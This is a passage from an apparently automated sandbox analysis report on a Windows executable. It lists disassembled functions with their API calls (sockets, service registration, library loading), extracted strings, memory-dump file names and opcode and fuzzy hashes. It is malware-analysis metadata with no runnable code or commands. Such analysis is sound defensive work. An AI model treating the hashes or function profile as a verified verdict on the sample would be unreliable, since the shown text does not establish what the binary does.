    • WSAGetLastError.WS2_32 ref: 00688B75
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00688BBF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$ErrorFailureLast_strlensend
    • String ID: SENT$Sending data failed (%d)
    • API String ID: 2661615204-3459338696
    • Opcode ID: 109fc82e4e7ccc237ca4de58e32435d5d285fe469006166510df7fa61c76dfe0
    • Instruction ID: 2acc3f4823a45d32b84346c42067ea7c29ceca2d0fad29a906da61ee84389bb8
    • Opcode Fuzzy Hash: 109fc82e4e7ccc237ca4de58e32435d5d285fe469006166510df7fa61c76dfe0
    • Instruction Fuzzy Hash: 0821D6B1D002499FDB44EFACD885BEE7BB6EB49310F504669F918EB391E6708A40C7D1
    Function 006D0687 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _wcsrchr
    • String ID: .bat$.cmd$.com$.exe
    • API String ID: 1752292252-4019086052
    • Opcode ID: 36d1216bd197228dfe7118ddf87383ca4a40c3ad2169e3e7f4b90f8f9caa6960
    • Instruction ID: 44d018e6c15228961ac17fe8a738cb7a8a83e896a9bf6059ff5c6cf2de6ad457
    • Opcode Fuzzy Hash: 36d1216bd197228dfe7118ddf87383ca4a40c3ad2169e3e7f4b90f8f9caa6960
    • Instruction Fuzzy Hash: 28012B37E0836A25761410299C52BF6139B9F92BB0B26402FF884FF3C1DE55EC028599
    Function 006648F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67networkCOMMON
    Download Yara Rule
    APIs
    • SleepEx.KERNEL32(00000000,00000000), ref: 00664929
    • getsockopt.WS2_32(000000FF,0000FFFF,00001007,00000000,00000004), ref: 0066494E
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • WSAGetLastError.WS2_32 ref: 00664961
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006649A5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckErrorFailureLastSleepStackVars@8getsockopt
    • String ID: H'
    • API String ID: 2620147948-3698549401
    • Opcode ID: fec15767a70a3a79d23337778cb2fbb7f430a3d963eabf1a50cc087e4c507ba9
    • Instruction ID: 05db067d8e47a2129ae7812fa1d4a35f130e9b44b22204e2050c6f0c971700d2
    • Opcode Fuzzy Hash: fec15767a70a3a79d23337778cb2fbb7f430a3d963eabf1a50cc087e4c507ba9
    • Instruction Fuzzy Hash: FA219571D04248AFDB50EFACD8457EEBBB59F05300F0081A9E848AB391D7754A84CFD1
    Function 00666020 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen
    • String ID: Digest$Digest$Digest
    • API String ID: 4218353326-162757003
    • Opcode ID: 6c7795e63551a8eca37f6d00019c87ec9c2dae474e1d912b752880b6e61716f8
    • Instruction ID: a162cbdf8c1f34cfc25860eef827ec10588c9ec6a7b8af9947bebec290978de4
    • Opcode Fuzzy Hash: 6c7795e63551a8eca37f6d00019c87ec9c2dae474e1d912b752880b6e61716f8
    • Instruction Fuzzy Hash: 8E116AF1E04249ABDF44DF98E942AAE7B76AF51304F14446DFC1587342E631EA208BA5
    Function 0068C460 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 60COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strstr
    • String ID: ;mode=$;mode=$N
    • API String ID: 2882301372-2029170996
    • Opcode ID: d008af29099aef458f59056f859e974b72f98230c7f0e32ce3fe63ff603dbd1b
    • Instruction ID: 1a33f76099d9c8e5a747d58d087a5f698df055b757a5aa6abd0a08fc9dfc9001
    • Opcode Fuzzy Hash: d008af29099aef458f59056f859e974b72f98230c7f0e32ce3fe63ff603dbd1b
    • Instruction Fuzzy Hash: 482183B0D04248EFCB04DFA8C4457EDBFB2AB05318F1486E9D4486B342D3759B85CB96
    Function 0068CF66 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s (%d) %s (%d)$Malformed ACK packet, rejecting$blksize parsed from OACK$requested
    • API String ID: 3286693010-3904120213
    • Opcode ID: 1e11502139bf5d5c80a8ea9b1ef463949e304f8eb062936d7f1e9890b3b3e8b6
    • Instruction ID: 5f06bc8a58bd258e622873ae9cc4759676e75708aac1b7b7c63a9a710e702078
    • Opcode Fuzzy Hash: 1e11502139bf5d5c80a8ea9b1ef463949e304f8eb062936d7f1e9890b3b3e8b6
    • Instruction Fuzzy Hash: 971186B6A00108EFCB04EF94DC45DEE77B6EF84315F108369F8096B382D6359A46CBA5
    Function 0068CF90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s (%d) %s (%d)$Malformed ACK packet, rejecting$blksize parsed from OACK$requested
    • API String ID: 3286693010-3904120213
    • Opcode ID: 78cdbdff8cb85b86b1d5f75ea3755100208db3f890d08519672fbfd64a7c40ee
    • Instruction ID: 5f06bc8a58bd258e622873ae9cc4759676e75708aac1b7b7c63a9a710e702078
    • Opcode Fuzzy Hash: 78cdbdff8cb85b86b1d5f75ea3755100208db3f890d08519672fbfd64a7c40ee
    • Instruction Fuzzy Hash: 971186B6A00108EFCB04EF94DC45DEE77B6EF84315F108369F8096B382D6359A46CBA5
    Function 006D3B07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,006D3AFC,?,?,006D3AC4,006FA414,?,?), ref: 006D3B1C
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006D3B2F
    • FreeLibrary.KERNEL32(00000000,?,?,006D3AFC,?,?,006D3AC4,006FA414,?,?), ref: 006D3B52
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: f86dbc15cc988623e2fad456fd2c23f88d8b0d15fe9d38839eae20cd5d24c2d0
    • Instruction ID: 659f1df80d1705d0383d01c49a634780445a8b2c37b6818e9caac53613b18296
    • Opcode Fuzzy Hash: f86dbc15cc988623e2fad456fd2c23f88d8b0d15fe9d38839eae20cd5d24c2d0
    • Instruction Fuzzy Hash: 70F05E30A01759BFCB119B51DE0DBDEBA6AAB04B56F100065E904A62A0CB748F01DA91
    Function 006D5346 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8FED: HeapAlloc.KERNEL32(00000000,?,?,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?,?,006BD8C4), ref: 006D901F
    • _free.LIBCMT ref: 006D5455
    • _free.LIBCMT ref: 006D546C
    • _free.LIBCMT ref: 006D5489
    • _free.LIBCMT ref: 006D54A4
    • _free.LIBCMT ref: 006D54BB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$AllocHeap
    • String ID:
    • API String ID: 1835388192-0
    • Opcode ID: 082dcc031898210d72aac4ab5033d549b5f6ff1ec45769f0a8b9fd855e37ee5f
    • Instruction ID: 8a048bebbfcf10e688dcc008e3c68ca69fb9d52b716f154c55bf741f7397326a
    • Opcode Fuzzy Hash: 082dcc031898210d72aac4ab5033d549b5f6ff1ec45769f0a8b9fd855e37ee5f
    • Instruction Fuzzy Hash: 7551E531E00B04AFDB21DF29CC41AAAB7F6EF54721B10456EE806D7791E731EA41CB84
    Function 0065D6F0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen
    • String ID:
    • API String ID: 1576176021-0
    • Opcode ID: d10ea1be0ce8a7c41ca5e85f33f414b15f343afec7ce308ecd3098a1c9ee1030
    • Instruction ID: 6e519d977dadf19d5be2aa16fb5fc77c29ed574e590f327a4a6c3adbe234c64f
    • Opcode Fuzzy Hash: d10ea1be0ce8a7c41ca5e85f33f414b15f343afec7ce308ecd3098a1c9ee1030
    • Instruction Fuzzy Hash: A2512970D00109EFDF14DFA8C991AEEBBB6AF45306F248099D815AB385E730AB45DB91
    Function 006D0280 Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON
    Download Yara Rule
    APIs
    • GetFileType.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,006D0505,00000000,?), ref: 006D02A2
    • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0505,00000000), ref: 006D02FC
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,006D0505,00000000,?,?,00000000,?,?), ref: 006D038A
    • __dosmaperr.LIBCMT ref: 006D0391
    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,006D0505), ref: 006D03CE
      • Part of subcall function 006D0735: __dosmaperr.LIBCMT ref: 006D076A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
    • String ID:
    • API String ID: 1206951868-0
    • Opcode ID: 2f452b88608b0ab3cc67d2c274f4ba31f980259b8b5735fbb21cc65f18fa8e1e
    • Instruction ID: af60f10ae7a27e461a533a3643977059b20b380233de26d4b59b2fc81fc1c70d
    • Opcode Fuzzy Hash: 2f452b88608b0ab3cc67d2c274f4ba31f980259b8b5735fbb21cc65f18fa8e1e
    • Instruction Fuzzy Hash: 09414A71900745AFEB64DFA5D845AAFBBFAEF89300B10452EF556D3711EB30A901CB20
    Function 006D424B Relevance: 7.6, APIs: 5, Instructions: 119COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006D42B9
    • _free.LIBCMT ref: 006D42D9
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D433A
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D434C
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D4359
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: __crt_fast_encode_pointer$_free
    • String ID:
    • API String ID: 366466260-0
    • Opcode ID: 21ba6f9add41e1fccb00d8a66b649eac510ab86da91e1d4d02a0f211e8811f6a
    • Instruction ID: de80e021e7d2d21c7966d433c9ca80fe757e1bf43a18175d8dc3d54ddb5c131b
    • Opcode Fuzzy Hash: 21ba6f9add41e1fccb00d8a66b649eac510ab86da91e1d4d02a0f211e8811f6a
    • Instruction Fuzzy Hash: 5B41A276E00204AFCB10EF6CC891A9EB7A6EF89714F16456AE555EB351DA31ED01CB80
    Function 00670250 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$_strlen
    • String ID:
    • API String ID: 3484544846-0
    • Opcode ID: 1c846e57703e5c29621b1aebe09b643578009cfb8cc4352d8e608558c169fd07
    • Instruction ID: 4fd58c6d725d9a1d8e9ae0345709893f9022bda98ee5c99e741e578feb7cbf78
    • Opcode Fuzzy Hash: 1c846e57703e5c29621b1aebe09b643578009cfb8cc4352d8e608558c169fd07
    • Instruction Fuzzy Hash: 764140B5D0020AEFDF40DFE8D941ABEB7B6BF05304F14855DE829A7302E6319A00CBA5
    Function 00641310 Relevance: 7.6, APIs: 5, Instructions: 104registryCOMMON
    Download Yara Rule
    APIs
    • RegisterServiceCtrlHandlerW.ADVAPI32(?,00641360), ref: 00641320
    • GetLastError.KERNEL32 ref: 00641339
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0064134B
    • SetServiceStatus.ADVAPI32(?), ref: 00641458
    • SetServiceStatus.ADVAPI32(?,00000008), ref: 0064148B
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Service$Status$CtrlErrorException@8HandlerLastRegisterThrow
    • String ID:
    • API String ID: 2582692417-0
    • Opcode ID: 412757fbc84d4444cd5f3642b7e21374dbdfe400428429a174c222b0e31b2502
    • Instruction ID: a12a10e50a8dc0d7b1ad4d8d83282370976d0c1dc350ebdc4244feb489733339
    • Opcode Fuzzy Hash: 412757fbc84d4444cd5f3642b7e21374dbdfe400428429a174c222b0e31b2502
    • Instruction Fuzzy Hash: 5F3170B5500708DFC720DF55E805B56BBF9FB49710F00862EE9498BB51CB36A554CFA8
    Function 006A2340 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen$_strstr
    • String ID:
    • API String ID: 3431573467-0
    • Opcode ID: 63ff20d60cb2190a47ad13ef402798bea1fa5f7f012005f89103372860b153a4
    • Instruction ID: 36d7cf967621405da2a59994037b09cf35f3268a908ba951ee0bd7cf2da107d8
    • Opcode Fuzzy Hash: 63ff20d60cb2190a47ad13ef402798bea1fa5f7f012005f89103372860b153a4
    • Instruction Fuzzy Hash: FD21E9B5D0020DEFCF00EF98D951AADBBB6AB46344F2084A8E8056B341E2749F84DF85
    Function 006E120A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 006E1222
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E1234
    • _free.LIBCMT ref: 006E1246
    • _free.LIBCMT ref: 006E1258
    • _free.LIBCMT ref: 006E126A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 6ba65589d91207322c6169dbd642bd8d0a5906963b38aecb7c01c249de4d5d45
    • Instruction ID: 7de37eff7723f2bedd7c8f4a6dafb21a600313de3ac931fda25fb212d436508a
    • Opcode Fuzzy Hash: 6ba65589d91207322c6169dbd642bd8d0a5906963b38aecb7c01c249de4d5d45
    • Instruction Fuzzy Hash: 01F04F32909340EFC660EB59E989C4AB7DBAA01B50354480AF618DB791CE34FDC09E98
    Function 006405E0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 411COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strcspn
    • String ID: $xo$(xo
    • API String ID: 3709121408-2036862407
    • Opcode ID: 43839d82540061b4e440ad1ee2c683b4b467d9db9bd4e82e42efddb7d6bb06bb
    • Instruction ID: 2a8403ad8ffdd0080ef9b01f9afddeda475dbb1e3a9f4f2f4f29e1204ac57075
    • Opcode Fuzzy Hash: 43839d82540061b4e440ad1ee2c683b4b467d9db9bd4e82e42efddb7d6bb06bb
    • Instruction Fuzzy Hash: C9F18B71A00259DFEF04DFA8C984AEEBBB6FF49304F144069E905AB352D731A941CBA1
    Function 006829F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 337COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682DF5
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
